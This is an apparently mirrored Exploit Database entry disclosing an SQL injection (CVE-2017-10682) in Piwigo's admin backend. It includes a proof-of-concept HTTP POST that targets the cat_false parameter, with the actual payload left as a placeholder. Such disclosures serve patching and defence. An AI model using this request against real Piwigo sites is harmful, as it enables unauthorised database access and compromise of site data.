Piwigo 2.9.1 – ‘cat_true’ / ‘cat_false’ SQL Injection

• Exploit Database
• 19 阅读

• 作者： Akityo
  日期： 2017-12-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43337/

• # # # # # 
  # Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection
  # Dork: N/A
  # Date: 12.12.2017
  # Vendor Homepage: http://piwigo.org/
  # Software Link: http://piwigo.org/basics/downloads
  # Version: <= 2.9.1
  # Category: Webapps
  # Tested on: WiN7_x64/WIN10_X64
  # CVE: CVE-2017-10682
  # # # # #
  # Exploit Author: Akityo
  # Email: akityo@foxmail.com
  # # # # #
  # Description:
  #
  # SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter
  # in the comments or status page to cat_options.php.
  #
  #
  # # # # #
  # Proof-of-Concent:
  #
  # POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1
  # Host: www.test.com
  # Content-Length: 34
  # Cache-Control: max-age=0
  # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  # Upgrade-Insecure-Requests: 1
  # User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
  # Content-Type: application/x-www-form-urlencoded
  # Accept-Encoding: gzip, deflate
  # Accept-Language: zh-CN,zh;q=0.8
  # Cookie: null
  # Connection: close
  #
  # cat_false%5B%5D=[payload here]&trueify=%C2%AB
  #
  #
  # # # # #